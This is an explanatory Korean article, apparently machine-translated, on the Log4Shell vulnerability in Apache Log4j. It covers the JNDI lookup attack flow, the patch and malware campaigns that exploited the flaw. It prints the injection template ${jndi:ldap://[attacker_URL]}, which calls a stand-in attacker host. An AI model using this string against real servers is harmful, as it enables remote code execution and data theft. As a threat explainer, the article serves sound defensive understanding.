Log4Shell 취약점
2021년 12월 10일 Apache Log4j Java 기반 로깅 플랫폼의 치명적인 취약점에 대한 익스플로잇이 릴리스되었습니다.공개적으로. CVE-2021-44228 또는 Log4Shell로 추적되는 이 취약점은 Log4j 2.0-beta9 및 최대 2.14.1의 Log4j 버전에 영향을 미칩니다. 위협 행위자는 이 익스플로잇을 이용하여 인증되지 않은 원격 액세스를 설정하고, 코드를 실행하고, 맬웨어 위협을 전달하거나 정보를 수집할 수 있습니다. Log4j는 엔터프라이즈 애플리케이션 및 클라우드 서비스에서 널리 사용되기 때문에 취약점은 심각한 상태로 지정됩니다.
Log4Shell 기술 세부 사항
익스플로잇은 위협 행위자가 웹 브라우저의 사용자 에이전트를 변경하는 것으로 시작됩니다. 그런 다음 사이트를 방문하거나 다음 형식으로 웹사이트에 있는 특정 문자열을 검색합니다.
${jndi:ldap://[attacker_URL]}
결과적으로 문자열이 웹 서버의 액세스 로그에 추가됩니다. 그런 다음 공격자는 Log4j 애플리케이션이 이러한 로그를 구문 분석하고 추가된 문자열에 도달할 때까지 기다립니다. 이 경우 버그가 트리거되어 서버가 JNDI 문자열에 있는 URL에 대한 콜백을 만듭니다. 해당 URL은 Base64로 인코딩된 명령 또는 Java 클래스를 처리하기 위해 남용됩니다.그런 다음 손상된 장치에서 실행합니다.
Apache는 익스플로잇을 해결하고 수정하기 위해 새 버전인 Log4j 2.15.0을 신속하게 출시했지만 상당량의 취약한 시스템이 장기간 패치되지 않은 상태로 남아 있을 수 있습니다. 동시에, 위협 행위자는 Log4Shell 제로데이 취약점을 빠르게 알아차리고 악용하기에 적합한 서버를 검색하기 시작했습니다. infosec 커뮤니티는 Log4Shell을 사용하여 광범위한 맬웨어 위협을 제공하는 수많은 공격 캠페인을 추적했습니다.
Log4Shell은 Cryptominer, Botnet, 백도어 및 데이터 수집 공격에 사용됩니다.
Log4Shell을 운영에 구현한 최초의 위협 행위자 중 하나는 Kinsing 암호화 채굴 봇넷 배후의 사이버 범죄자였습니다. 해커는 Log4Shell을 사용하여 Base64로 인코딩된 페이로드를 전달하고 셸 스크립트를 실행했습니다. 이러한 스크립트의 역할은 자체 Kinsing 맬웨어가 실행되기 전에 경쟁 크립토마이닝 위협으로부터 대상 시스템을 정리하는 것입니다.
Netlab 360은 취약점을 사용하여 침해된 장치에 Mirai 및 Muhstik 봇넷 버전을 설치하는 위협 행위자를 탐지했습니다. 이러한 맬웨어 위협은 감염된 시스템을 IoT 장치 및 서버 네트워크에 추가하도록 설계되었으며 공격자는 DDoS(분산 서비스 거부) 공격을 시작하거나 크립토 마이너를 배포하도록 지시할 수 있습니다.그후.
Microsoft Threat Intelligence Center에 따르면 Log4j 익스플로잇은 Cobalt Strike 비콘을 떨어뜨리는 공격 캠페인의 표적이기도 합니다. Cobalt Strike는 회사의 보안 시스템에 대한 침투 테스트에 사용되는 합법적인 소프트웨어 도구입니다.그러나 백도어 기능으로 인해 수많은 위협 행위자 그룹의 공통 무기가 되었습니다. 그 후 피해자의 네트워크에 대한 불법 백도어 액세스를 사용하여 랜섬웨어, 정보 스틸러 및 기타 멀웨어 위협과 같은 차세대 페이로드를 전달합니다.
Log4Shell은 서버 데이터를 포함하는 환경 변수를 획득하기 위해 악용될 수 있습니다. 이런 식으로 공격자는 호스트 이름, OS 이름, OS 버전 번호, Log4j 서비스가 실행되는 사용자 이름 등에 액세스할 수 있습니다.